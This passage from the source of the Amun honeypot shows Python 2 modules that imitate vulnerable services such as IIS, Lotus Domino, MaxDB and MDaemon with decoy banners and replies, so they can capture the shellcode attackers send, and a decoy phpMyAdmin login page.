103 | 				resultSet["accept"] = False
104 | 				resultSet["reply"] = "None"
105 | 				return resultSet
106 | 			return resultSet
107 | 		except KeyboardInterrupt:
108 | 			raise
109 | 		except StandardError, e:
110 | 			print e
111 | 			f = StringIO.StringIO()
112 | 			traceback.print_exc(file=f)
113 | 			print f.getvalue()
114 | 			sys.exit(1)
115 | 		except:
116 | 			print "HELIX fatal error"
117 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-helix/helix_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-helix/helix_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-hpopenview/hpopenview_modul.py:
--------------------------------------------------------------------------------
  1 | try:
  2 | 	import psyco ; psyco.full()
  3 | 	from psyco.classes import *
  4 | except ImportError:
  5 | 	pass
  6 | 
  7 | import traceback
  8 | import StringIO
  9 | import sys
 10 | import struct
 11 | import amun_logging
 12 | import random
 13 | import hpopenview_shellcodes
 14 | 
 15 | class vuln(object):
 16 | 	__slots__ = ("vuln_name", "stage", "welcome_message", "shellcode", "reply", "log_obj")
 17 | 
 18 | 	def __init__(self):
 19 | 		try:
 20 | 			self.vuln_name = "HPOpenView Vulnerability"
 21 | 			self.stage = "HPOpenView_STAGE1"
 22 | 			self.welcome_message = ""
 23 | 			self.shellcode = []
 24 | 		except KeyboardInterrupt:
 25 | 			raise
 26 | 
 27 | 	def print_message(self, data):
 28 | 		print "\n"
 29 | 		counter = 1
 30 | 		for byte in data:
 31 | 			if counter==16:
 32 | 				ausg = hex(struct.unpack("B",byte)[0])
 33 | 				if len(ausg) == 3:
 34 | 					list = str(ausg).split("x")
 35 | 					ausg = "%sx0%s" % (list[0],list[1])
 36 | 					print ausg
 37 | 				else:
 38 | 					print ausg
 39 | 				counter = 0
 40 | 			else:
 41 | 				ausg = hex(struct.unpack("B",byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split("x")
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg,
 46 | 				else:
 47 | 					print ausg,
 48 | 			counter += 1
 49 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 50 | 
 51 | 	def getVulnName(self):
 52 | 		return self.vuln_name
 53 | 
 54 | 	def getCurrentStage(self):
 55 | 		return self.stage
 56 | 
 57 | 	def getWelcomeMessage(self):
 58 | 		return self.welcome_message
 59 | 
 60 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 61 | 		try:
 62 | 			### logging object
 63 | 			self.log_obj = amun_logging.amun_logging("vuln_hpopenview", vuLogger)
 64 | 			### construct standard reply
 65 | 			self.reply = random_reply
 66 | 			### prepare default resultSet
 67 | 			resultSet = {}
 68 | 			resultSet["vulnname"] = self.vuln_name
 69 | 			resultSet["accept"] = False
 70 | 			resultSet["result"] = False
 71 | 			resultSet["shutdown"] = False
 72 | 			resultSet["reply"] = "None"
 73 | 			resultSet["stage"] = self.stage
 74 | 			resultSet["shellcode"] = "None"
 75 | 			resultSet["isFile"] = False
 76 | 
 77 | 			if self.stage == "HPOpenView_STAGE1" and bytes>=524:
 78 | 				resultSet["result"] = True
 79 | 				resultSet["accept"] = True
 80 | 				resultSet["reply"] = "".join(self.reply)
 81 | 				self.shellcode.append(message)
 82 | 				self.stage = "SHELLCODE"
 83 | 				return resultSet
 84 | 			elif self.stage == "SHELLCODE":
 85 | 				if bytes>0:
 86 | 					resultSet["result"] = True
 87 | 					resultSet["accept"] = True
 88 | 					resultSet["reply"] = "".join(self.reply)
 89 | 					self.shellcode.append(message)
 90 | 					self.stage = "SHELLCODE"
 91 | 					return resultSet
 92 | 				else:
 93 | 					resultSet["result"] = False
 94 | 					resultSet["accept"] = True
 95 | 					resultSet["reply"] = "None"
 96 | 					self.shellcode.append(message)
 97 | 					resultSet["shellcode"] = "".join(self.shellcode)
 98 | 					return resultSet
 99 | 			else:
100 | 				resultSet["result"] = False
101 | 				resultSet["accept"] = False
102 | 				resultSet["reply"] = "None"
103 | 				return resultSet
104 | 			return resultSet
105 | 		except KeyboardInterrupt:
106 | 			raise
107 | 		except StandardError, e:
108 | 			print e
109 | 			f = StringIO.StringIO()
110 | 			traceback.print_exc(file=f)
111 | 			print f.getvalue()
112 | 			sys.exit(1)
113 | 		except:
114 | 			print "HPOpenView fatal error"
115 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-hpopenview/hpopenview_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-hpopenview/hpopenview_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-http/http_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | defaultReply = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>It works!</title></head><html><body><h1>It works!</h1><br>tim.bohn@gmx.net<br>johan83@freenet.de</body></html>\n\n'
3 | 
4 | badRequest = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n<title>400 Bad Request</title>\r\n</head><body>\r\n<h1>Bad Request</h1>\r\n<p>Your browser sent a request that this server could not understand.<br />\r\n</p>\r\n<hr>\r\n<address>Apache/1.3.29 Server at Port 80</address>\r\n</body></html>\r\n'
5 | 
6 | phpmyadmin = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\r\n<html><head><title>phpMyAdmin</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><link rel="stylesheet" type="text/css" href="style.css" />\r\n<link rel="stylesheet" type="text/css" href="print.css" media="print" />\r\n\r\n</head>\r\n<body class="loginform">\r\n<div class="container"><a href="http://www.phpmyadmin.net" target="_blank" class="logo"><img src="logo_right.png" id="imLogo" name="imLogo" alt="phpMyAdmin" border="0" /></a><h1>    Welcome to <bdo dir="ltr" xml:lang="en">phpMyAdmin </bdo></h1><form method="post" action="index.php" target="_parent"><input type="hidden" name="collation_connection" value="utf8_unicode_ci" /><input type="hidden" name="convcharset" value="iso-8859-1" /><input type="hidden" name="server" value="1" /><fieldset><legend xml:lang="en" dir="ltr">Language <a href="translators.html" target="documentation"><img class="icon" src="b_info.png" width="11" height="11" alt="Info" /></a></legend><select name="lang" onchange="this.form.submit();" xml:lang="en" dir="ltr"><option value="af-utf-8">Afrikaans (utf-8)</option><option value="sq-utf-8">Shqip - Albanian (utf-8)</option><option value="en-utf-8" selected="selected">English (utf-8)</option><option value="de-utf-8">Deutsch - German (utf-8)</option></select></fieldset><noscript><fieldset class="tblFooters"><input type="submit" value="Go" /></fieldset></noscript></form><br /><!-- Login form --><form method="post" action="index.php" name="login_form" target="_top" class="login"><fieldset><legend>Log in<a href="Documentation.html" target="documentation" title="phpMyAdmin documentation"><img class="icon" src="b_help.png" width="11" height="11" alt="phpMyAdmin documentation" /></a></legend><div class="item"><label for="input_username">Username:</label><input type="text" name="pma_username" id="input_username" value="" size="24" class="textfield" /></div><div class="item"><label for="input_password">Password:</label><input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" /></div><div class="item"><label for="select_server">Server Choice:</label><select name="server" id="select_server"><option value="1"  selected="selected">10.0.0.1:3306</option></select></div></fieldset><fieldset class="tblFooters"><input value="Go" type="submit" /><input type="hidden" name="lang" value="en-utf-8" /><input type="hidden" name="convcharset" value="iso-8859-1" /></fieldset></form></div></body></html>\r\n'
7 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-iis/iis_modul.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import struct
19 | import random
20 | import iis_shellcodes
21 | 
22 | class vuln:
23 | 	def __init__(self):
24 | 		try:
25 | 			self.vuln_name = "IIS Vulnerability"
26 | 			self.stage = "IIS_STAGE1"
27 | 			self.welcome_message = ""
28 | 			self.shellcode = []
29 | 		except KeyboardInterrupt:
30 | 			raise
31 | 
32 | 	def getVulnName(self):
33 | 		return self.vuln_name
34 | 
35 | 	def getCurrentStage(self):
36 | 		return self.stage
37 | 
38 | 	def getWelcomeMessage(self):
39 | 		return self.welcome_message
40 | 
41 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
42 | 		try:
43 | 			### construct standard reply
44 | 			self.reply = []
45 | 			for i in range(0,62):
46 | 				try:
47 | 					self.reply.append("\x00")
48 | 				except KeyboardInterrupt:
49 | 					raise
50 | 
51 | 			### prepare default resultSet
52 | 			resultSet = {}
53 | 			resultSet["vulnname"] = self.vuln_name
54 | 			resultSet["accept"] = False
55 | 			resultSet["result"] = False
56 | 			resultSet["shutdown"] = False
57 | 			resultSet["reply"] = "None"
58 | 			resultSet["stage"] = self.stage
59 | 			resultSet["shellcode"] = "None"
60 | 			resultSet["isFile"] = False
61 | 
62 | 			if self.stage == "IIS_STAGE1" and (bytes==133 or bytes>=140 or bytes==78):
63 | 				resultSet["result"] = True
64 | 				resultSet["accept"] = True
65 | 				resultSet["reply"] = "".join(self.reply)
66 | 				self.shellcode.append(message)
67 | 				self.stage = "SHELLCODE"
68 | 				return resultSet
69 | 			elif self.stage == "SHELLCODE":
70 | 				if bytes>0:
71 | 					resultSet["result"] = True
72 | 					resultSet["accept"] = True
73 | 					resultSet["reply"] = "".join(self.reply)
74 | 					self.shellcode.append(message)
75 | 					self.stage = "SHELLCODE"
76 | 					#resultSet["shellcode"] = "".join(self.shellcode)
77 | 					return resultSet
78 | 				else:
79 | 					resultSet["reply"] = "None"
80 | 					self.shellcode.append(message)
81 | 					resultSet["shellcode"] = "".join(self.shellcode)
82 | 					if len(resultSet["shellcode"])!=142:
83 | 						resultSet["result"] = False
84 | 						resultSet["accept"] = True
85 | 					return resultSet
86 | 			else:
87 | 				resultSet["result"] = False
88 | 				resultSet["accept"] = False
89 | 				resultSet["reply"] = "None"
90 | 				return resultSet
91 | 			return resultSet
92 | 		except KeyboardInterrupt:
93 | 			raise
94 | 		except StandardError, e:
95 | 			print e
96 | 		except:
97 | 			print "IIS fatal error"
98 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-iis/iis_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-iis/iis_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-imail/imail_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-imail/imail_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-lotusdomino/lotusdomino_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import lotusdomino_shellcodes
 21 | import amun_logging
 22 | 
 23 | import traceback
 24 | import StringIO
 25 | import sys
 26 | 
 27 | class vuln:
 28 | 	def __init__(self):
 29 | 		try:
 30 | 			self.vuln_name = "LOTUS_DOMINO Vulnerability"
 31 | 			self.stage = "LOTUS_STAGE1"
 32 | 			self.welcome_message = "a200 Lotus Domino 6.5.4 7.0.2 IMAP4"
 33 | 			self.shellcode = []
 34 | 		except KeyboardInterrupt:
 35 | 			raise
 36 | 
 37 | 	def print_message(self, data):
 38 | 		print "\n"
 39 | 		counter = 1
 40 | 		for byte in data:
 41 | 			if counter==16:
 42 | 				ausg = hex(struct.unpack("B",byte)[0])
 43 | 				if len(ausg) == 3:
 44 | 					list = str(ausg).split("x")
 45 | 					ausg = "%sx0%s" % (list[0],list[1])
 46 | 					print ausg
 47 | 				else:
 48 | 					print ausg
 49 | 				counter = 0
 50 | 			else:
 51 | 				ausg = hex(struct.unpack("B",byte)[0])
 52 | 				if len(ausg) == 3:
 53 | 					list = str(ausg).split("x")
 54 | 					ausg = "%sx0%s" % (list[0],list[1])
 55 | 					print ausg,
 56 | 				else:
 57 | 					print ausg,
 58 | 			counter += 1
 59 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 60 | 
 61 | 	def getVulnName(self):
 62 | 		return self.vuln_name
 63 | 
 64 | 	def getCurrentStage(self):
 65 | 		return self.stage
 66 | 
 67 | 	def getWelcomeMessage(self):
 68 | 		return self.welcome_message
 69 | 
 70 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 71 | 		try:
 72 | 			self.log_obj = amun_logging.amun_logging("vuln_lotusdomino", vuLogger)
 73 | 
 74 | 			### construct standard reply
 75 | 			self.reply = []
 76 | 			for i in range(0,1022):
 77 | 				try:
 78 | 					self.reply.append("\x00")
 79 | 				except KeyboardInterrupt:
 80 | 					raise
 81 | 
 82 | 			### prepare default resultSet
 83 | 			resultSet = {}
 84 | 			resultSet["vulnname"] = self.vuln_name
 85 | 			resultSet["accept"] = False
 86 | 			resultSet["result"] = False
 87 | 			resultSet["shutdown"] = False
 88 | 			resultSet["reply"] = "None"
 89 | 			resultSet["stage"] = self.stage
 90 | 			resultSet["shellcode"] = "None"
 91 | 			resultSet["isFile"] = False
 92 | 
 93 | 			if self.stage == "LOTUS_STAGE1" and bytes>0:
 94 | 				resultSet["result"] = True
 95 | 				resultSet["accept"] = True
 96 | 				self.reply = "a001 OK LOGIN completed"
 97 | 				resultSet['reply'] = self.reply
 98 | 				self.stage = "SHELLCODE"
 99 | 				return resultSet
100 | 			elif self.stage == "SHELLCODE":
101 | 				if bytes>0:
102 | 					resultSet["result"] = True
103 | 					resultSet["accept"] = True
104 | 					resultSet['reply'] = "".join(self.reply)
105 | 					self.shellcode.append(message)
106 | 					self.stage = "SHELLCODE"
107 | 					#resultSet["shellcode"] = "".join(self.shellcode)
108 | 					return resultSet
109 | 				else:
110 | 					resultSet["result"] = False
111 | 					resultSet["accept"] = True
112 | 					resultSet["reply"] = "None"
113 | 					self.shellcode.append(message)
114 | 					resultSet["shellcode"] = "".join(self.shellcode)
115 | 					return resultSet
116 | 			else:
117 | 				resultSet["result"] = False
118 | 				resultSet["accept"] = False
119 | 				resultSet["reply"] = "None"
120 | 				return resultSet
121 | 			return resultSet
122 | 		except KeyboardInterrupt:
123 | 			raise
124 | 		except StandardError, e:
125 | 			print e
126 | 			f = StringIO.StringIO()
127 | 			traceback.print_exc(file=f)
128 | 			print f.getvalue()
129 | 			sys.exit(1)
130 | 		#except:
131 | 		#	print "Lotus Domino fatal error"
132 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-lotusdomino/lotusdomino_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-lotusdomino/lotusdomino_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-maxdb/maxdb_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import maxdb_shellcodes
 21 | import amun_logging
 22 | 
 23 | class vuln:
 24 | 	def __init__(self):
 25 | 		try:
 26 | 			self.vuln_name = "MaxDB Vulnerability"
 27 | 			self.stage = "SHELLCODE"
 28 | 			self.welcome_message = ""
 29 | 			self.shellcode = []
 30 | 		except KeyboardInterrupt:
 31 | 			raise
 32 | 
 33 | 	def print_message(self, data):
 34 | 		print "\n"
 35 | 		counter = 1
 36 | 		for byte in data:
 37 | 			if counter==16:
 38 | 				ausg = hex(struct.unpack("B",byte)[0])
 39 | 				if len(ausg) == 3:
 40 | 					list = str(ausg).split("x")
 41 | 					ausg = "%sx0%s" % (list[0],list[1])
 42 | 					print ausg
 43 | 				else:
 44 | 					print ausg
 45 | 				counter = 0
 46 | 			else:
 47 | 				ausg = hex(struct.unpack("B",byte)[0])
 48 | 				if len(ausg) == 3:
 49 | 					list = str(ausg).split("x")
 50 | 					ausg = "%sx0%s" % (list[0],list[1])
 51 | 					print ausg,
 52 | 				else:
 53 | 					print ausg,
 54 | 			counter += 1
 55 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 56 | 
 57 | 	def getVulnName(self):
 58 | 		return self.vuln_name
 59 | 
 60 | 	def getCurrentStage(self):
 61 | 		return self.stage
 62 | 
 63 | 	def getWelcomeMessage(self):
 64 | 		return self.welcome_message
 65 | 
 66 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 67 | 		try:
 68 | 			self.log_obj = amun_logging.amun_logging("vuln_maxdb", vuLogger)
 69 | 
 70 | 			### construct standard reply
 71 | 			self.reply = []
 72 | 			for i in range(0,510):
 73 | 				try:
 74 | 					self.reply.append("\x00")
 75 | 				except KeyboardInterrupt:
 76 | 					raise
 77 | 
 78 | 			### prepare default resultSet
 79 | 			resultSet = {}
 80 | 			resultSet["vulnname"] = self.vuln_name
 81 | 			resultSet["accept"] = False
 82 | 			resultSet["result"] = False
 83 | 			resultSet["shutdown"] = False
 84 | 			resultSet["reply"] = "None"
 85 | 			resultSet["stage"] = self.stage
 86 | 			resultSet["shellcode"] = "None"
 87 | 			resultSet["isFile"] = False
 88 | 
 89 | 			if self.stage == "SHELLCODE":
 90 | 				if bytes>0:
 91 | 					if message.count('\x42\x69\x74\x54\x6f\x72\x72\x65\x6e\x74')>0:
 92 | 						self.log_obj.log("BitTorrent Request ignored", 6, "crit", True, False)
 93 | 						resultSet["accept"] = False
 94 | 						resultSet["result"] = False
 95 | 						resultSet["shellcode"] = "None"
 96 | 						return resultSet
 97 | 					else:
 98 | 						resultSet["result"] = True
 99 | 						resultSet["accept"] = True
100 | 						resultSet["reply"] = "".join(self.reply)
101 | 						if message.count('\x90')<1024:
102 | 							self.shellcode.append(message)
103 | 						self.stage = "SHELLCODE"
104 | 						return resultSet
105 | 				else:
106 | 					resultSet["result"] = False
107 | 					resultSet["accept"] = True
108 | 					resultSet["reply"] = "None"
109 | 					self.shellcode.append(message)
110 | 					resultSet["shellcode"] = "".join(self.shellcode)
111 | 					return resultSet
112 | 			else:
113 | 				resultSet["result"] = False
114 | 				resultSet["accept"] = False
115 | 				resultSet["reply"] = "None"
116 | 				return resultSet
117 | 			return resultSet
118 | 		except KeyboardInterrupt:
119 | 			raise
120 | 		except StandardError, e:
121 | 			print e
122 | 		except:
123 | 			print "MaxDB fatal error"
124 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-maxdb/maxdb_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-maxdb/maxdb_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-mdaemon/mdaemon_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import mdaemon_shellcodes
 21 | import os
 22 | 
 23 | class vuln:
 24 | 
 25 | 	def __init__(self):
 26 | 		try:
 27 | 			self.vuln_name = "MDAEMON Vulnerability"
 28 | 			self.stage = "MDAEMON_STAGE1"
 29 | 			self.welcome_message = "220 mailserver"
 30 | 			self.shellcode = []
 31 | 		except KeyboardInterrupt:
 32 | 			raise
 33 | 
 34 | 	def print_message(self, data):
 35 | 		print "\n"
 36 | 		counter = 1
 37 | 		for byte in data:
 38 | 			if counter==16:
 39 | 				ausg = hex(struct.unpack('B',byte)[0])
 40 | 				if len(ausg) == 3:
 41 | 					list = str(ausg).split('x')
 42 | 					ausg = "%sx0%s" % (list[0],list[1])
 43 | 					print ausg
 44 | 				else:
 45 | 					print ausg
 46 | 				counter = 0
 47 | 			else:
 48 | 				ausg = hex(struct.unpack('B',byte)[0])
 49 | 				if len(ausg) == 3:
 50 | 					list = str(ausg).split('x')
 51 | 					ausg = "%sx0%s" % (list[0],list[1])
 52 | 					print ausg,
 53 | 				else:
 54 | 					print ausg,
 55 | 			counter += 1
 56 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 57 | 
 58 | 	def getVulnName(self):
 59 | 		return self.vuln_name
 60 | 
 61 | 	def getCurrentStage(self):
 62 | 		return self.stage
 63 | 
 64 | 	def getWelcomeMessage(self):
 65 | 		return self.welcome_message
 66 | 
 67 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 68 | 		try:
 69 | 			self.reply = []
 70 | 			for i in range(0,510):
 71 | 				try:
 72 | 					self.reply.append("\x00")
 73 | 				except KeyboardInterrupt:
 74 | 					raise
 75 | 			resultSet = {}
 76 | 			resultSet['vulnname'] = self.vuln_name
 77 | 			resultSet['result'] = False
 78 | 			resultSet['accept'] = False
 79 | 			resultSet['shutdown'] = False
 80 | 			resultSet['reply'] = "None"
 81 | 			resultSet['stage'] = self.stage
 82 | 			resultSet['shellcode'] = "None"
 83 | 			resultSet["isFile"] = False
 84 | 
 85 | 			if self.stage=="MDAEMON_STAGE1" and bytes>=1024 and (message.startswith('USER') or message.startswith('user')):
 86 | 				resultSet['result'] = True
 87 | 				resultSet['accept'] = True
 88 | 				#self.reply = "220 OK"
 89 | 				#resultSet['reply'] = self.reply
 90 | 				self.stage = "SHELLCODE"
 91 | 				return resultSet
 92 | 			elif self.stage=="SHELLCODE":
 93 | 				if bytes>0:
 94 | 					resultSet['result'] = True
 95 | 					resultSet['accept'] = True
 96 | 					self.shellcode.append(message)
 97 | 					self.stage = "SHELLCODE"
 98 | 					resultSet['reply'] = "".join(self.reply)
 99 | 					#resultSet['shellcode'] = "".join(self.shellcode)
100 | 					return resultSet
101 | 				else:
102 | 					resultSet['result'] = False
103 | 					resultSet['accept'] = True
104 | 					resultSet['reply'] = "None"
105 | 					self.shellcode.append(message)
106 | 					resultSet['shellcode'] = "".join(self.shellcode)
107 | 					return resultSet
108 | 			else:
109 | 				resultSet['result'] = False
110 | 				resultSet['reply'] = "None"
111 | 				return resultSet
112 | 			return resultSet
113 | 		except KeyboardInterrupt:
114 | 			raise
115 | 		except StandardError, e:
116 | 			print e
117 | 			return resultSet
118 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mdaemon/mdaemon_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mercury/mercury_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import amun_logging
 20 | import random
 21 | import mercury_shellcodes
 22 | 
 23 | class vuln:
 24 | 	def __init__(self):
 25 | 		try:
 26 | 			self.vuln_name = "MERCURY Vulnerability"
 27 | 			self.stage = "SHELLCODE"
 28 | 			self.welcome_message = ""
 29 | 			self.shellcode = []
 30 | 		except KeyboardInterrupt:
 31 | 			raise
 32 | 
 33 | 	def print_message(self, data):
 34 | 		print "\n"
 35 | 		counter = 1
 36 | 		for byte in data:
 37 | 			if counter==16:
 38 | 				ausg = hex(struct.unpack("B",byte)[0])
 39 | 				if len(ausg) == 3:
 40 | 					list = str(ausg).split("x")
 41 | 					ausg = "%sx0%s" % (list[0],list[1])
 42 | 					print ausg
 43 | 				else:
 44 | 					print ausg
 45 | 				counter = 0
 46 | 			else:
 47 | 				ausg = hex(struct.unpack("B",byte)[0])
 48 | 				if len(ausg) == 3:
 49 | 					list = str(ausg).split("x")
 50 | 					ausg = "%sx0%s" % (list[0],list[1])
 51 | 					print ausg,
 52 | 				else:
 53 | 					print ausg,
 54 | 			counter += 1
 55 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 56 | 
 57 | 	def getVulnName(self):
 58 | 		return self.vuln_name
 59 | 
 60 | 	def getCurrentStage(self):
 61 | 		return self.stage
 62 | 
 63 | 	def getWelcomeMessage(self):
 64 | 		return self.welcome_message
 65 | 
 66 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 67 | 		try:
 68 | 			self.log_obj = amun_logging.amun_logging("vuln_mercury", vuLogger)
 69 | 
 70 | 			### construct standard reply
 71 | 			self.reply = []
 72 | 			for i in range(0,510):
 73 | 				try:
 74 | 					self.reply.append("\x00")
 75 | 				except KeyboardInterrupt:
 76 | 					raise
 77 | 
 78 | 			### prepare default resultSet
 79 | 			resultSet = {}
 80 | 			resultSet["vulnname"] = self.vuln_name
 81 | 			resultSet["accept"] = False
 82 | 			resultSet["result"] = False
 83 | 			resultSet["shutdown"] = False
 84 | 			resultSet["reply"] = "None"
 85 | 			resultSet["stage"] = self.stage
 86 | 			resultSet["shellcode"] = "None"
 87 | 			resultSet["isFile"] = False
 88 | 
 89 | 			if self.stage == "SHELLCODE":
 90 | 				if bytes==1024:
 91 | 					resultSet["result"] = True
 92 | 					resultSet["accept"] = True
 93 | 					resultSet["reply"] = "".join(self.reply)
 94 | 					self.shellcode.append(message)
 95 | 					self.stage = "SHELLCODE"
 96 | 					#resultSet["shellcode"] = "".join(self.shellcode)
 97 | 					return resultSet
 98 | 				else:
 99 | 					resultSet["result"] = False
100 | 					resultSet["accept"] = True
101 | 					resultSet["reply"] = "None"
102 | 					self.shellcode.append(message)
103 | 					resultSet["shellcode"] = "".join(self.shellcode)
104 | 					return resultSet
105 | 			else:
106 | 				resultSet["result"] = False
107 | 				resultSet["accept"] = False
108 | 				resultSet["reply"] = "None"
109 | 				return resultSet
110 | 			return resultSet
111 | 		except KeyboardInterrupt:
112 | 			raise
113 | 		except StandardError, e:
114 | 			print e
115 | 		except:
116 | 			print "MERCURY fatal error"
117 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-mercury/mercury_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-mercury/mercury_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-msdtc/msdtc_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
